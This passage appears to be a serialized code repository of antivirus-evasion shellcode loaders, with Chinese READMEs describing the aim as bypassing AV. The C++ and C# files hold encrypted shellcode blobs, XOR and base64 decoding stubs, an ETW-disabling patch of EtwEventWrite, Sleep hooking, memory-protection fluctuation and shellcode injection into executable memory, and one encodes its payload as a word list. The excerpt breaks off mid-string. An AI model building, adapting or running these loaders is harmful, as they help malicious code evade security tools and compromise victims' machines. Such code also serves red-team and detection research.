std::string::size_type st = str.find(pSrc, stStart);\n\n if (st == str.npos)\n\n {\n break;\n }\n\n iter = iter + st - stStart;\n str.replace(iter, iter + strlen(pSrc), pReplace);\n iter = iter + strlen(pReplace);\n stStart = st + strlen(pReplace);\n }\n\n return str;\n\n}\n\nint main(int argc, char** argv)\n{\n \n\n std::string rest2_reference = \"9ECL7PjgwAgICElZSVhaWV5AOdptQINaaECDWhBAg1ooQIN6WEAHv0JCRTnBQDnIpDRpdAokKEnJwQVJCcnq5VpJWUCDWiiDSjRACdhuiXAQAwp9eoOIgAgICECNyHxvQAnYWINAEEyDSChBCdjrXkD3wUmDPIBACd5FOcFAOcikScnBBUkJyTDofflEC0QsAE0x2X3QUEyDSCxBCdhuSYMEQEyDSBRBCdhJgwyAQAnYSVBJUFZRUklQSVFJUkCL5ChJWvfoUElRUkCDGuFH9/f3VWIIQbZ/YWZhZm18CEleQYHuRIH5SbJEfy4P991AOcFAOdpFOchFOcFJWElYSbIyXnGv993je1JAgclJsFgICAhFOcFJWUlZYgtJWUmyX4GXzvfd41FTQIHJQDnaQYHQRTnBWmAICkiMWlpJsuNdJjP33UCBzkCLy1hiAldAgflAgdJBz8j39/f3RTnBWlpJsiUOEHP33Y3IB42VCQgIQPfHB4yECQgI49vh7AkICOCq9/f3J0V8UEwIQShDvCCeEfnGqz4QOUCZb1k9zZRfrP2kaoTlwQZQ+aY4tgZwQlaNp0lYfmGOcGoGYzblJRLD9V4TH2y6c1s4iOAMlePMttdpgghde216JUlvbWZ8MihFZ3JhZGRpJzwmOCgga2dleGl8YWpkbTMoRVtBTSg/JjgzKF9hZmxnf3soRlwoPSY5IQUCCM1l6QoDmhAeJZoutN1CPkoMbBYRT4p4JodhVtQQ/QXiL7U61RfcwKRjFq95GITSknVDXEYydGh4NjiMRT6a43pevMz6zCoiQMDcYy/1jHjhWWvhVp/6TPSIiL5RP8LaSwpz++6FswyGtYnKUJ+da0rRw4YW4GE1isJ9yBukKGBzCetRpZrAZtf8AZPUpuLRg9gLYdXFeifw5yhKxN4jy6BQV14m/VHXb2WO3XrQXc7c0CxfgIM1rYMHGVMH6y9uyurrF7uMzIg+sptJ4pFTYuzDslBKxx4+qcw2ikCPTsks2vAe8rGqLYAwlP4+eRcISbb4vape991AOcGyCAhICEmwCBgICEmxSAgICEmyUKxb7ffdQJtbW0CB70CB+UCB0kmwCCgICEGB8UmyGp6B6vfdQIvMKI3IfL5ugw9ACcuNyH3fUFBQQA0ICAgIWMvgl/X39zkxOiY5PjAmOCY5OzkIWQG3ZQ@@\";\n\n std::string rest3_reference = replace(rest2_reference, \"@@\", \"==\");\n\n std::string rest2_decoded = base64_decode(rest3_reference);\n\n const char* S = rest2_decoded.c_str();\n\n std::vector shellcode;\n\n for (int j = 0; j < rest2_decoded.length(); j++) {\n shellcode.push_back(S[j]^XOR_KEY);\n }\n\n //LoadLibraryA(\"C:\\\\Users\\\\Admin\\\\Desktop\\\\RefleXXion-DLL.dll\");\n\n try\n {\n // Don't you play tricks with values outside of this enum, I'm feeling like catching all your edge cases...\n g_fluctuate = (TypeOfFluctuation)1;\n }\n catch (...)\n {\n log(\"[!] Invalid mode provided\");\n return 1;\n }\n\n\n\n if (g_fluctuate != NoFluctuation)\n {\n log(\"[.] Hooking kernel32!Sleep...\");\n if (!hookSleep())\n {\n log(\"[!] Could not hook kernel32!Sleep!\");\n return 1;\n }\n }\n else\n {\n log(\"[.] Shellcode will not fluctuate its memory pages protection.\");\n }\n\n if (g_fluctuate == NoFluctuation)\n {\n log(\"[.] Entering infinite loop (not injecting the shellcode) for memory IOCs examination.\");\n log(\"[.] PID = \", std::dec, GetCurrentProcessId());\n while (true) {}\n }\n else if (g_fluctuate == FluctuateToNA)\n {\n log(\"\\n[.] Initializing VEH Handler to intercept invalid memory accesses due to PAGE_NOACCESS.\");\n log(\" This is a re-implementation of ORCA666's work presented in his https://github.com/ORCA666/0x41 project.\\n\");\n AddVectoredExceptionHandler(1, &VEHHandler);\n }\n\n log(\"[.] Injecting shellcode...\");\n\n HandlePtr thread(NULL, &::CloseHandle);\n if (!injectShellcode(shellcode, thread))\n {\n log(\"[!] Could not inject shellcode! Error: \", ::GetLastError());\n return 1;\n }\n\n log(\"[+] Shellcode is now running. PID = \", std::dec, GetCurrentProcessId());\n\n WaitForSingleObject(thread.get(), INFINITE);\n}" }, { "path": "chapter4-demo4/ShellcodeFluctuation/x64/Debug/Shellcod.9eed9e19.tlog/ShellcodeFluctuation.lastbuildstate", "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebug|x64|E:\\ShellcodeFluctuation-master\\|\r\n" }, { "path": "chapter4-demo4/ShellcodeFluctuation/x64/Debug/ShellcodeFluctuation.exe.recipe", "content": "\r\n\r\n \r\n \r\n E:\\ShellcodeFluctuation-master\\x64\\Debug\\ShellcodeFluctuation.exe\r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "chapter4-demo4/ShellcodeFluctuation/x64/Debug/ShellcodeFluctuation.log", "content": " base64.cpp\r\n main.cpp\r\n 正在生成代码...\r\n ShellcodeFluctuation.vcxproj -> E:\\ShellcodeFluctuation-master\\x64\\Debug\\ShellcodeFluctuation.exe\r\n" }, { "path": "chapter4-demo4/ShellcodeFluctuation/x64/Release/Shellcod.9eed9e19.tlog/ShellcodeFluctuation.lastbuildstate", "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRelease|x64|E:\\ShellcodeFluctuation-master\\|\r\n" }, { "path": "chapter4-demo4/ShellcodeFluctuation/x64/Release/ShellcodeFluctuation.exe.recipe", "content": "\r\n\r\n \r\n \r\n E:\\ShellcodeFluctuation-master\\x64\\Release\\ShellcodeFluctuation.exe\r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "chapter4-demo4/ShellcodeFluctuation/x64/Release/ShellcodeFluctuation.log", "content": " main.cpp\r\n 正在生成代码\r\n 已完成代码的生成\r\n 3 of 350 functions ( 0.9%) were compiled, the rest were copied from previous compilation.\r\n 0 functions were new in current compilation\r\n 0 functions had inline decision re-evaluated but remain unchanged\r\n ShellcodeFluctuation.vcxproj -> E:\\ShellcodeFluctuation-master\\x64\\Release\\ShellcodeFluctuation.exe\r\n" }, { "path": "chapter4-demo4/ShellcodeFluctuation.sln", "content": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.31105.61\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"ShellcodeFluctuation\", \"ShellcodeFluctuation\\ShellcodeFluctuation.vcxproj\", \"{9EED9E19-9475-4D2E-9B06-37D6799417FE}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|x64 = Debug|x64\n\t\tDebug|x86 = Debug|x86\n\t\tRelease|x64 = Release|x64\n\t\tRelease|x86 = Release|x86\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x64.Build.0 = Debug|x64\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Debug|x86.Build.0 = Debug|Win32\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x64.ActiveCfg = Release|x64\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x64.Build.0 = Release|x64\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x86.ActiveCfg = Release|Win32\n\t\t{9EED9E19-9475-4D2E-9B06-37D6799417FE}.Release|x86.Build.0 = Release|Win32\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\n\tGlobalSection(ExtensibilityGlobals) = postSolution\n\t\tSolutionGuid = {C5AF3E09-A902-42DF-9A8C-D63A66F8F25B}\n\tEndGlobalSection\nEndGlobal\n" }, { "path": "demo1/README.md", "content": "使用disableETW,shellcode加密,隐藏导入表的免杀方式对shellcode进行免杀。\r\n\r\n" }, { "path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/resource.h", "content": "//{{NO_DEPENDENCIES}}\r\n// Microsoft Visual C++ generated include file.\r\n// Used by shellcode_execute.rc\r\n\r\n// ¶һĬֵ\r\n// \r\n#ifdef APSTUDIO_INVOKED\r\n#ifndef APSTUDIO_READONLY_SYMBOLS\r\n#define _APS_NEXT_RESOURCE_VALUE 101\r\n#define _APS_NEXT_COMMAND_VALUE 40001\r\n#define _APS_NEXT_CONTROL_VALUE 1001\r\n#define _APS_NEXT_SYMED_VALUE 101\r\n#endif\r\n#endif\r\n" }, { "path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.cpp", "content": "// shellcode_execute.cpp : 此文件包含 \"main\" 函数。程序执行将在此处开始并结束。\r\n//\r\n\r\n#include \r\n#include \r\n\r\ntypedef void* (*tNtVirtual) (HANDLE ProcessHandle, IN OUT PVOID* BaseAddress, IN OUT PSIZE_T NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);\r\ntNtVirtual oNtVirtual;\r\n\r\n\r\nvoid disableETW(void) {\r\n\t// return 0\r\n\tunsigned char patch[] = { 0x48, 0x33, 0xc0, 0xc3 }; // xor rax, rax; ret\r\n\r\n\tULONG oldprotect = 0;\r\n\tsize_t size = sizeof(patch);\r\n\r\n\tHANDLE hCurrentProc = GetCurrentProcess();\r\n\r\n\tunsigned char sEtwEventWrite[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0x0 };\r\n\r\n\r\n\r\n\r\n\tvoid* pEventWrite = GetProcAddress(GetModuleHandle(\"ntdll.dll\"), (LPCSTR)sEtwEventWrite);\r\n\tif ((DWORD)GetModuleHandle(\"ntdll.dll\") == NULL) { std::cout << \"error\"; }\r\n\telse {\r\n\t\tprintf(\"NTDLL.DLL START ADDRESS: %08x\", (DWORD)GetModuleHandle(\"ntdll.dll\"));\r\n\t}\r\n\tif ((DWORD)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtProtectVirtualMemory\") == NULL) { std::cout << \"error\"; }\r\n\telse { printf(\"\\nNtProtectVirtualMemory ADDRESS: %08x\", (DWORD)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtProtectVirtualMemory\")); }\r\n\r\n\tFARPROC farProc = GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtProtectVirtualMemory\");\r\n\r\n\r\n\toNtVirtual = (tNtVirtual)farProc;\r\n\toNtVirtual(hCurrentProc, &pEventWrite, (PSIZE_T)&size, PAGE_READWRITE, &oldprotect);\r\n\r\n\t//memcpy(pEventWrite, patch, size / sizeof(patch[0]));\r\n\tmemcpy(pEventWrite, patch, 4);\r\n\toNtVirtual(hCurrentProc, &pEventWrite, (PSIZE_T)&size, oldprotect, &oldprotect);\r\n\tFlushInstructionCache(hCurrentProc, pEventWrite, size);\r\n\r\n}\r\n\r\nint main()\r\n{\r\n\r\n\tdisableETW();\r\n\t// Encrypted shellcode and cipher key obtained from shellcode_encoder.py\r\n\tchar encryptedShellcode[] = \"\\x9d\\x2c\\xee\\x8d\\x9e\\xd9\\xfa\\x33\\x61\\x64\\x2c\\x38\\x2f\\x61\\x60\\x62\\x37\\x2c\\x5c\\xbb\\x0b\\x79\\xb9\\x61\\x01\\x2c\\xe6\\x3b\\x76\\x79\\xb9\\x61\\x41\\x2c\\xe6\\x1b\\x3e\\x79\\x3d\\x84\\x2b\\x2e\\x20\\x58\\xa7\\x79\\x03\\xf3\\xcd\\x58\\x0c\\x15\\x6c\\x1d\\x12\\x72\\xa0\\xad\\x60\\x28\\x6f\\xf0\\xd0\\xde\\x33\\x25\\x3c\\x21\\xe5\\x63\\x12\\xb8\\x23\\x58\\x25\\x68\\xbe\\x57\\xb3\\x4b\\x79\\x6f\\x6f\\x1c\\x1c\\xba\\xb2\\xbb\\x61\\x64\\x6d\\x21\\xeb\\xf1\\x46\\x54\\x29\\x65\\xbd\\x39\\xe5\\x79\\x2a\\x77\\xea\\x24\\x4d\\x20\\x6f\\xe1\\xd1\\x65\\x29\\x9b\\xa4\\x28\\xe5\\x05\\xba\\x7b\\x60\\xb2\\x20\\x58\\xa7\\x79\\x03\\xf3\\xcd\\x25\\xac\\xa0\\x63\\x70\\x33\\xf2\\x59\\x84\\x18\\x98\\x22\\x32\\x7e\\x17\\x69\\x21\\x54\\xb8\\x1b\\xe9\\x6a\\x77\\xea\\x24\\x49\\x20\\x6f\\xe1\\x54\\x72\\xea\\x68\\x25\\x2d\\xe5\\x71\\x2e\\x7a\\x60\\xb4\\x2c\\xe2\\x6a\\xb9\\x7a\\x32\\xb1\\x25\\x35\\x28\\x36\\x6f\\x6b\\x69\\x20\\x3c\\x2c\\x30\\x2f\\x6b\\x7a\\xb0\\x8d\\x44\\x2c\\x3b\\x91\\xd1\\x6a\\x72\\x38\\x3e\\x25\\xe2\\x7c\\xd8\\x7d\\xcc\\x9e\\x9b\\x30\\x03\\x6e\\x78\\x8c\\x44\\x08\\x0a\\x04\\x07\\x0b\\x45\\x32\\x72\\x37\\x2d\\xe4\\x8f\\x22\\xb8\\xc3\\x72\\xdb\\x28\\x1a\\x4f\\x69\\xce\\xe7\\x7b\\x50\\xad\\x25\\x58\\xbc\\x7c\\x03\\xf3\\x2c\\x55\\xa4\\x28\\x3e\\x70\\x62\\x72\\xdb\\x5e\\x3b\\x10\\xc9\\xce\\xe7\\xd8\\x12\\x3e\\x25\\xe0\\xaf\\x70\\x8a\\x63\\x61\\x64\\x6d\\x24\\x5f\\xf8\\x73\\x62\\x20\\x35\\x07\\x6a\\x2f\\x60\\x73\\x89\\x36\\xed\\xf2\\xaf\\x91\\xe4\\xd9\\x6a\\x3a\\x2c\\xe4\\xa8\\x26\\x00\\xe0\\x7a\\xe8\\xbc\\x20\\x58\\xa7\\x63\\x5a\\x33\\x63\\x24\\xe9\\x3b\\x3c\\x70\\x88\\xd8\\x34\\x4a\\x56\\x96\\xbb\\x79\\xbb\\xf5\\x29\\xe7\\xae\\x39\\x04\\x3b\\x6d\\x7b\\xe8\\x95\\x25\\xe0\\xb4\\x78\\xf5\\xf3\\x9e\\x9b\\x92\\x96\\x23\\x00\\xfb\\x61\\x33\\x25\\xd7\\x44\\x68\\x29\\x49\\xcc\\xb4\\xe1\\xad\\x66\\xeb\\xac\\x33\\x33\\x61\\x2c\\x92\\xa6\\x61\\xb5\\xbe\\x32\\x61\\x64\\x86\\xba\\x87\\xd5\\x33\\x33\\x61\\x8c\\xcf\\x96\\x91\\xce\\x1d\\x7b\\x08\\x33\\x38\\x69\\x4d\\x8f\\xa4\\xd5\\x7b\\x55\\x01\\x8a\\x85\\x56\\x9c\\xb4\\x92\\x22\\x6b\\xd6\\x06\\x79\\xb1\\x2e\\x11\\x1b\\x45\\x36\\x97\\x6f\\x2d\\xf9\\x27\\x1a\\xde\\x58\\x82\\x9c\\x28\\xfb\\x0a\\x5a\\x47\\x5e\\x3a\\x95\\x9e\\x45\\x87\\xce\\x2e\\x71\\x66\\x11\\x44\\xa4\\xa2\\xc6\\xb4\\xda\\xb0\\xf0\\x79\\x01\\xa1\\x4b\\xa2\\xa2\\x6c\\x08\\x4d\\x5a\\x0f\\x2c\\x9c\\x35\\x49\\x31\\x67\\x40\\x04\\x16\\x40\\x28\\x09\\x54\\x5c\\x47\\x5b\\x44\\x20\\x06\\x14\\x58\\x5e\\x5f\\x00\\x4b\\x59\\x47\\x5e\\x11\\x1a\\x50\\x0e\\x09\\x1d\\x08\\x1a\\x58\\x50\\x5f\\x04\\x5f\\x4d\\x24\\x3d\\x78\\x77\\x13\\x59\\x4a\\x5d\\x52\\x4e\\x66\\x5b\\x5d\\x05\\x0b\\x1a\\x1a\\x4e\\x7f\\x66\\x13\\x54\\x4a\\x5c\\x52\\x4e\\x65\\x40\\x5a\\x05\\x01\\x03\\x1d\\x41\\x05\\x1c\\x03\\x5a\\x44\\x24\\x07\\x08\\x5e\\x62\\x52\\x15\\x0c\\x43\\x58\\x47\\x3c\\x38\\x33\\x1b\\xe3\\x8f\\x91\\x34\\x7d\\x94\\xe7\\x55\\x9e\\x46\\x53\\x60\\x6e\\x3f\\x4a\\xe7\\x37\\x40\\x69\\xe3\\x86\\xdc\\xd4\\x60\\x11\\xb2\\x3e\\xa5\\xe0\\xd7\\x59\\xf3\\xef\\x66\\xec\\xf6\\x89\\x3f\\x2e\\x04\\x9a\\x4d\\x63\\x28\\x8f\\x0c\\xf5\\x04\\xf9\\x39\\x69\\xee\\x77\\xfe\\xaa\\xcd\\x85\\x7d\\x3a\\xbc\\x22\\x48\\x4e\\x14\\x29\\x7c\\x69\\x7c\\xa1\\xb0\\xe2\\xa7\\xc3\\xa1\\xfd\\x39\\x08\\x58\\x09\\xd5\\x19\\x74\\x6e\\x29\\xc5\\xb6\\x8d\\x3a\\x27\\x52\\xd4\\xe4\\x0b\\x17\\xbf\\x2c\\x23\\xea\\x0b\\x2b\\xd1\\x28\\xef\\x7b\\xda\\x5b\\x15\\x29\\xd6\\x48\\x76\\x9d\\x43\\x7b\\x41\\x0e\\x14\\xe6\\x30\\xef\\x6e\\xbf\\x3f\\x9b\\xf2\\xbe\\xd6\\xbb\\x5f\\x67\\xf9\\x8e\\xd0\\x3d\\x9a\\x84\\x55\\xe9\\xd6\\x29\\x08\\xf9\\xae\\xf3\\x52\\x19\\xfa\\xf4\\xf7\\x5a\\xcf\\x79\\x9d\\x0a\\xb1\\x96\\x94\\xf7\\xed\\x72\\x5b\\xd8\\x2b\\x8c\\x23\\x93\\x35\\xcc\\x3e\\xe1\\xc2\\x4d\\xd7\\x05\\x7b\\x95\\xeb\\x2b\\x93\\xdb\\xf6\\xc0\\xbe\\x37\\x64\\xdd\\x2a\\x7a\\xf7\\xa0\\x70\\x3e\\xb2\\x1d\\x5b\\xa5\\x78\\x3e\\x78\\xa0\\x50\\xc1\\xa1\\xb2\\x03\\x9a\\x8b\\x8a\\x91\\xa9\\x29\\xae\\x31\\x73\\x8d\\x91\\xd1\\xcf\\x3f\\x91\\xe4\\x7a\\x02\\xa8\\xde\\x6d\\x69\\x2e\\x31\\x73\\x8b\\x61\\x74\\x6d\\x69\\x2f\\x88\\x72\\x33\\x61\\x64\\x2c\\xd3\\x36\\x95\\x61\\xd6\\x9e\\xb1\\x25\\xfa\\x3d\\x62\\x7a\\xba\\x86\\x2c\\xe4\\x98\\x26\\xb8\\xe8\\x72\\xd9\\x64\\x4d\\x69\\x6e\\x78\\xbb\\xca\\x20\\xde\\x7f\\xff\\xe7\\xd3\\xcd\\xe6\\x29\\xe7\\xa9\\x49\\xeb\\xf1\\x46\\x85\\x07\\xef\\x6a\\x21\\x6f\\xf2\\xb7\\xf3\\x14\\xb3\\x35\\x31\\x36\\x79\\x37\\x33\\x61\\x64\\x6d\\x39\\xad\\xd9\\xad\\xce\\x9e\\x9b\\x5c\\x50\\x5c\\x1f\\x03\\x05\\x59\\x4a\\x5d\\x47\\x5f\\x02\\x03\\x33\\x30\\x6d\\xd2\\x04\";\r\n\tchar key[] = \"admin123\";\r\n\tchar cipherType[] = \"xor\";\r\n\r\n\r\n\t// Char array to host the deciphered shellcode\r\n\tchar shellcode[sizeof encryptedShellcode];\r\n\r\n\r\n\t// XOR decoding stub using the key defined above must be the same as the encoding key\r\n\tint j = 0;\r\n\tfor (int i = 0; i < sizeof encryptedShellcode; i++) {\r\n\t\tif (j == sizeof key - 1) j = 0;\r\n\r\n\t\tshellcode[i] = encryptedShellcode[i] ^ key[j];\r\n\t\tj++;\r\n\t}\r\n\r\n\ttypedef VOID *(WINAPI* pVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);\r\n\r\n\tpVirtualAlloc fnVirtualProtect;\r\n\r\n\tunsigned char sVirtualProtect[] = { 'V','i','r','t','u','a','l','A','l','l','o','c', 0x0 };\r\n\tunsigned char sKernel32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0x0 };\r\n\r\n\tfnVirtualProtect = (pVirtualAlloc)GetProcAddress(GetModuleHandle((LPCSTR)sKernel32), (LPCSTR)sVirtualProtect);\r\n\t// call VirtualProtect\r\n\tvoid* exec = fnVirtualProtect(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\r\n\r\n\tmemcpy(exec, shellcode, sizeof shellcode);\r\n\r\n\t// Call the shellcode\r\n\t//((void(*)())exec)();\r\n\r\n}\r\n" }, { "path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.rc", "content": "// Microsoft Visual C++ ɵԴű\r\n//\r\n\r\n#include \"resource.h\"\r\n\r\n#define APSTUDIO_READONLY_SYMBOLS\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// TEXTINCLUDE 2 Դɡ\r\n//\r\n#include \"winres.h\"\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n#undef APSTUDIO_READONLY_SYMBOLS\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n// (壬й) Դ\r\n\r\n#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)\r\nLANGUAGE 4, 2\r\n\r\n#ifdef APSTUDIO_INVOKED\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// TEXTINCLUDE\r\n//\r\n\r\n1 TEXTINCLUDE\r\nBEGIN\r\n \"resource.h\\0\"\r\nEND\r\n\r\n2 TEXTINCLUDE \r\nBEGIN\r\n \"#include \"\"winres.h\"\"\\r\\n\"\r\n \"\\0\"\r\nEND\r\n\r\n3 TEXTINCLUDE \r\nBEGIN\r\n \"\\r\\n\"\r\n \"\\0\"\r\nEND\r\n\r\n#endif // APSTUDIO_INVOKED\r\n\r\n#endif // (壬й) Դ\r\n/////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n\r\n#ifndef APSTUDIO_INVOKED\r\n/////////////////////////////////////////////////////////////////////////////\r\n//\r\n// TEXTINCLUDE 3 Դɡ\r\n//\r\n\r\n\r\n/////////////////////////////////////////////////////////////////////////////\r\n#endif // APSTUDIO_INVOKED\r\n" }, { "path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.vcxproj", "content": "\r\n\r\n \r\n \r\n Debug\r\n Win32\r\n \r\n \r\n Release\r\n Win32\r\n \r\n \r\n Debug\r\n x64\r\n \r\n \r\n Release\r\n x64\r\n \r\n \r\n \r\n 16.0\r\n Win32Proj\r\n {77df2be0-aec7-47ad-b5f8-114f3eb54e91}\r\n shellcodeexecute\r\n 10.0\r\n \r\n \r\n \r\n Application\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n Application\r\n false\r\n v143\r\n true\r\n Unicode\r\n \r\n \r\n Application\r\n true\r\n v143\r\n MultiByte\r\n \r\n \r\n Application\r\n false\r\n v143\r\n true\r\n MultiByte\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n Level3\r\n true\r\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n Level3\r\n true\r\n true\r\n true\r\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n Level3\r\n true\r\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n MultiThreaded\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n Level3\r\n true\r\n true\r\n true\r\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n false\r\n MultiThreaded\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.vcxproj.filters", "content": "\r\n\r\n \r\n \r\n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\r\n cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx\r\n \r\n \r\n {93995380-89BD-4b04-88EB-625FBE52EBFB}\r\n h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd\r\n \r\n \r\n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\r\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\r\n \r\n \r\n \r\n \r\n 源文件\r\n \r\n \r\n" }, { "path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute/shellcode_execute.vcxproj.user", "content": "\r\n\r\n \r\n WindowsLocalDebugger\r\n \r\n" }, { "path": "demo1/shellcode_execute/shellcode_execute/shellcode_execute.sln", "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.2.32519.379\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"shellcode_execute\", \"shellcode_execute\\shellcode_execute.vcxproj\", \"{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Release|x64.Build.0 = Release|x64\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{77DF2BE0-AEC7-47AD-B5F8-114F3EB54E91}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {1281A27F-E3AA-4335-BC13-1310F2CB94CC}\r\n\tEndGlobalSection\r\nEndGlobal\r\n" }, { "path": "demo2/README.md", "content": "使用字符串加密、异或加密、沙箱绕过方式进行bypass AV。\r\n\r\ndemo2 使用 CreateThread方式创建新进程极易被拦截,改用EtwpCreateEtwThread加载shellcode,改版的程序为demo3.\r\n" }, { "path": "demo2/shellcode_execut3/shellcode_execut3/App.config", "content": "\r\n\r\n \r\n \r\n \r\n" }, { "path": "demo2/shellcode_execut3/shellcode_execut3/Program.cs", "content": "using System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\n\r\nusing System;\r\nusing System.IO;\r\nusing System.Collections.Generic;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\nusing System.Security.Cryptography;\r\nusing System.Runtime.InteropServices;\r\n\r\nnamespace RunShellCode\r\n{\r\n static class Program\r\n {\r\n private static T[] SubArray(this T[] data, int index, int length)\r\n {\r\n T[] result = new T[length];\r\n Array.Copy(data, index, result, 0, length);\r\n return result;\r\n }\r\n\r\n private static byte[] xor(byte[] cipher, byte[] key)\r\n {\r\n byte[] decrypted = new byte[cipher.Length];\r\n\r\n for (int i = 0; i < cipher.Length; i++)\r\n {\r\n decrypted[i] = (byte)(cipher[i] ^ key[i % key.Length]);\r\n }\r\n\r\n return decrypted;\r\n }\r\n\r\n\r\n static void Main()\r\n {\r\n \r\n string p = \"puffs knives definitions offering principal peg footing thermals berths observer knives catch publication berths drive spots strings knives truths anticipation resolution occurrence cuff berths shed knives odors yaws company occurrence cuff berths polish knives odors harbor centimeter occurrence buzzes spans sets noises prefix change guess occurrence lifetimes resident differences change glances updates reliabilities specialties formation scenes cabinet facilities drive addresses friday emergency hills apples thermals airfield welds sod honor alkalinity formation bypasses conversions change airfield accumulations communications monolith telecommunication commanders occurrence friday friday similarity similarity spare twist anticipation berths observer drydocks sod certifications lamps adherence default hardcopies others experiences scope honor occurrence seeds shortages rate sponges thermocouples prefix friday surges bails others hardcopies expiration grids addresses honor ounce spare eighths drive twist prefix change guess occurrence lifetimes resident differences airfield ornaments cabinet alkalinity mules thermals point subtotal spans entrances entry vent expenditures science scratch entries sod default bypasses harbor swamps armory shortages rate sponges chimney prefix friday surges default scenes rate accumulations airfield hazard honor restrictions noises properties drive 